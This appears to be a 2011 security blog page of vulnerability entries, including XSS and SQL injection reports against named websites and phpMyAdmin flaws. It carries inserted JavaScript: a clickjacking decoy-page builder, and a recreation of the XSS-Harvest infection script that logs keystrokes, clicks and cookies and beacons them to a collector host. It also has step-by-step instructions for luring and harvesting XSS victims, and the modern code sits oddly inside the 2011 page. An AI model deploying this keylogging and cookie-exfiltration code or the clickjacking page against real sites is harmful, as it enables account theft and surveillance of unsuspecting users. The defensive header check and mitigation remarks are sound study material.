... newer entries
Wednesday, 13. July 2011
Mitigating Software Vulnerabilities
Posted Wednesday, 13 July 2011 in topic 'Vulnerabilities'
How exploit mitigation technologies can help reduce or eliminate risk, prevent attacks and minimize operational disruption due to software vulnerabilities
Download PDF
http://www.microsoft.com/downloads/info.aspx?na=41&srcfamilyid=3fec5647-f58b-4443-9ead-eb219f4bf31d&srcdisplaylang=en&u=http%3a%2f%2fdownload.microsoft.com%2fdownload%2f5%2f0%2f5%2f505646ED-5EDF-4E23-8E84-6119E4BF82E0%2fMitigating_Software_Vulnerabilities.pdf
Windows x64 Shellcode
Posted Wednesday, 13 July 2011 in topic 'Vulnerabilities'
Contents
Introduction
RIP-Relative Addressing
API Lookup Overview
API Lookup Demo
The Code
Building
Testing
Comments
Mitigations
Source:
http://mcdermottcybersecurity.com/articles/windows-x64-shellcode
Monday, 11. July 2011
WebCalendar - XSS
Posted Monday, 11 July 2011 in topic 'Vulnerabilities'
Affected Software: Version 1.2.3 and probably prior versions
Vendor URL: http://www.k5n.us/webcalendar.php
Details
http://www.rul3z.de/advisories/SSCHADV2011-008.txt
by schurtz
Clickjacking Attacks Unresolved
Posted Monday, 11 July 2011 in topic 'Vulnerabilities'
Clickjacking attacks were originally described by Robert Hansen and Jeremiah Grossman in 2008. In these attacks, the attacker tricks the user into interacting with a malicious web page, but routes the user’s input to another web page that would result in undesirable consequences. A commonly used technique is to embed the targeted web page with a completely transparent IFRAME and lure the user to click on it unintentionally. There are plenty of known variants demonstrated by researchers, with or without JavaScript.
read full article
https://docs.google.com/document/pub?id=1hVcxPeCidZrM5acFH9ZoTYzg1D0VjkG3BDW_oUdn5qc
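As an added example (not code from the linked paper), the overlay trick from the paragraph above next to the check a defender runs on a response: does the page carry a header that forbids framing at all? The target URL, decoy text and button offsets are made-up placeholders; the header values are the real X-Frame-Options and CSP frame-ancestors syntax.

```javascript
// Attacker side: the decoy page. The victim sees "Claim your prize", but the
// click lands in a fully transparent IFRAME that is positioned so that the
// target page's sensitive button sits exactly under the decoy button.
// (targetUrl, offsetX and offsetY are hypothetical; offsets are the position
// of the sensitive button inside the target page.)
function buildClickjackPage(targetUrl, offsetX, offsetY) {
  const decoyTop = 100, decoyLeft = 100;
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;top:${decoyTop}px;left:${decoyLeft}px;">Claim your prize</button>`,
    // opacity:0 keeps the frame invisible but still clickable; the higher
    // z-index puts it above the decoy so the click goes to the framed page.
    `<iframe src="${targetUrl}" style="position:absolute;` +
      `top:${decoyTop - offsetY}px;left:${decoyLeft - offsetX}px;` +
      'width:800px;height:600px;opacity:0;z-index:2;border:0;"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Defender side: can a third-party page frame this response?
// CSP frame-ancestors takes precedence over X-Frame-Options in browsers that
// support it; X-Frame-Options DENY/SAMEORIGIN is the 2011-era control.
function assessFrameProtection(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map(s => s.trim())
    .find(s => s.toLowerCase().startsWith('frame-ancestors'));
  if (fa) {
    const sources = fa.split(/\s+/).slice(1)
      .map(s => s.replace(/^'|'$/g, '').toLowerCase());
    // '*' or a bare scheme source reopens framing to arbitrary origins.
    const open = sources.some(s => s === '*' || s === 'http:' || s === 'https:');
    return { thirdPartyFrameable: open, control: 'csp', detail: fa };
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    return { thirdPartyFrameable: false, control: 'xfo', detail: xfo };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    // Chrome and Safari never implemented ALLOW-FROM and treat the header as
    // absent, so the page is frameable in those browsers.
    return { thirdPartyFrameable: true, control: 'xfo', detail: 'ALLOW-FROM unsupported by Chrome/Safari' };
  }
  if (xfo) {
    return { thirdPartyFrameable: true, control: 'xfo', detail: `invalid value "${xfo}" is treated as absent` };
  }
  return { thirdPartyFrameable: true, control: 'none', detail: 'no anti-framing header' };
}
```

Frame-busting JavaScript (`if (top !== self) top.location = self.location`) is not in the check because it is bypassable, for example by loading the target in an `<iframe sandbox>` that forbids top-level navigation; a header the browser enforces before any script runs is the control to look for.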
Sunday, 10. July 2011
BBC XSS Vulnerability
Posted Sunday, 10 July 2011 in topic 'Vulnerabilities'
by Nerv
Saturday, 9. July 2011
Facebook Sql Injection
Posted Saturday, 9 July 2011 in topic 'Vulnerabilities'
by Nerv
Burger King - Xss Attack
Posted Saturday, 9 July 2011 in topic 'Vulnerabilities'
by Nerv
Thursday, 7. July 2011
Harvesting Cross Site Scripting (XSS) Victims - Clicks, Keystrokes and Cookies - Linux
Posted Thursday, 7 July 2011 in topic 'Vulnerabilities'
XSS-Harvest.
It is a multi-threaded, pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a separate web server or database to use this tool. Before going into the detail, I'll list the high-level functionality below:
Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
Any key entered will be sent covertly to the server.
Any mouse click performed will be analysed and the data covertly sent to the server.
Optionally 'redress' the vulnerable page to display a different page on the same subdomain - e.g. a login form.
If redressing the victim's browser, allow subsequently loaded pages to be 'infected' as well, as long as they stay within the same origin (same scheme, host and port as the vulnerable page); the same-origin policy stops the script from reaching into pages loaded from anywhere else.
Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
Each victim has a separate history file containing all events, cookies and keystrokes.
Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
Tested in IE6-9 (the XSS filter in IE8 and IE9 blocks most reflected payloads, so exploitation there is usually limited to stored XSS), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.
How to Exploit XSS with XSS-Harvest
Identify a page vulnerable to XSS (reflected or persistent will be fine, unless the victim's browser has a reflected-XSS filter such as IE9's or an add-on such as NoScript, in which case you will generally need stored XSS).
Understand the markup of the page. You should be looking to insert syntactically correct tags in to the source of the vulnerable page. Most attackers will insert something like 'alert(1)' at this stage to ensure the page is actually vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port below 1024 (the default port is 80), or as a limited user on a port above 1024 using the -p option. To start the server you must instruct it to listen with the -l option.
Insert the following 'injection string' into the vulnerable page:
This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in - a new history file will be created for each new victim.
If you wish to make use of the redress function, start the server with the -r parameter:
./xss-harvest.pl -l -r http://vulnerablepage.local/login.html
Download:
https://docs.google.com/leaf?id=0B-yhjV3y1-D2ZmVlMmUxMWUtNjJhYy00Njc5LWI0M2ItZTMwMmIxMTQ0NTNh&hl=en_GB
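To make the infection-script behaviour listed above concrete, here is an added example that is not XSS-Harvest's own code: the event hooks, the per-event beacon, and the unique-URL workaround for Internet Explorer's request throttling, written as plain functions so they run under Node.js against a constructed stand-in for the DOM. The collector address, query-parameter names and victim id are hypothetical and do not reproduce XSS-Harvest's real URL scheme.

```javascript
const SERVER = 'http://harvest.example';   // assumed collector address (placeholder)

// One beacon per event. The sequence number and timestamp guarantee that no
// two requests share a URL, which is the workaround for Internet Explorer
// throttling repeated requests to an identical URL when keystrokes are exfiltrated.
let seq = 0;
function beaconUrl(victimId, kind, data) {
  seq += 1;
  const q = new URLSearchParams({
    v: victimId, k: kind, d: data, s: String(seq), t: String(Date.now()),
  });
  return `${SERVER}/b?${q.toString()}`;
}

// Describe a click the way a harvester's history file would: tag, id or name,
// and visible text, enough to tell "Log in" from "Cancel".
function describeClick(target) {
  const tag = (target.tagName || '').toLowerCase();
  const ident = target.id || target.name || '';
  const text = (target.value || target.textContent || '').trim().slice(0, 40);
  return `${tag}#${ident}:${text}`;
}

// Hook the page. `doc` is the victim document and `send` is the exfiltration
// channel; in a browser that would be `u => { new Image().src = u; }`, a GET
// that needs no XMLHttpRequest and is not blocked by the same-origin policy.
function install(doc, victimId, send) {
  // Only cookies visible to script are harvested; HttpOnly cookies are not in document.cookie.
  send(beaconUrl(victimId, 'load', doc.cookie || ''));
  doc.addEventListener('keydown', ev => {
    send(beaconUrl(victimId, 'key', ev.key));
  });
  doc.addEventListener('click', ev => {
    send(beaconUrl(victimId, 'click', describeClick(ev.target)));
  });
}

// Constructed stand-in for the DOM so the example runs offline under Node.js.
function mockDocument(cookie) {
  const listeners = {};
  return {
    cookie,
    addEventListener(type, fn) { (listeners[type] = listeners[type] || []).push(fn); },
    dispatch(type, ev) { for (const fn of listeners[type] || []) fn(ev); },
  };
}

// Drive the mock: one load beacon, four keystrokes, one click on a login button.
function demo() {
  const sent = [];
  const doc = mockDocument('session=abc123');   // constructed sample cookie
  install(doc, 'victim-1', u => sent.push(u));
  for (const key of ['p', 'a', 's', 's']) doc.dispatch('keydown', { key });
  doc.dispatch('click', { target: { tagName: 'INPUT', id: 'login', value: 'Log in' } });
  return sent;
}
```

Two things the mock makes visible for the defender: the load beacon carries only what `document.cookie` exposes, so marking session cookies HttpOnly keeps them out of the history file, and every beacon is an image-style GET to a foreign host, which a Content-Security-Policy with a restrictive `img-src` and `connect-src` blocks. Neither replaces fixing the injection itself, since keystrokes typed into the infected page are captured before any cookie or network control applies.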
Wednesday, 6. July 2011
Dukascopy.com - SQL Injection
Posted Wednesday, 6 July 2011 in topic 'Vulnerabilities'
General Information
Website: www.dukascopy.com
Vulnerability Type: SQL Injection Vulnerability
Alert Level: Critical
Threats: Entire Database Access, Shell Uploading
by Mr. zsecure
phpMyAdmin Multiple Vulnerabilities
Posted Wednesday, 6 July 2011 in topic 'Vulnerabilities'
Software:
phpMyAdmin 3.x
1) An error within the "Swekey_login()" function in libraries/auth/swekey/swekey.auth.lib.php can be exploited to overwrite session variables and e.g. inject and execute arbitrary PHP code.
2) Input passed to the "PMA_createTargetTables()" function in libraries/server_synchronize.lib.php is not properly sanitised before calling the "preg_replace()" function with the "e" modifier. This can be exploited to execute arbitrary PHP code via URL-encoded NULL bytes.
3) Input passed to the "PMA_displayTableBody()" function in libraries/display_tbl.lib.php is not properly sanitised before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal sequences.
NOTE: There is also a weakness in the setup scripts that could lead to arbitrary PHP code injection if session variables are overwritten.
The vulnerabilities are reported in versions prior to 3.3.10.2 and 3.4.3.1.
... older entries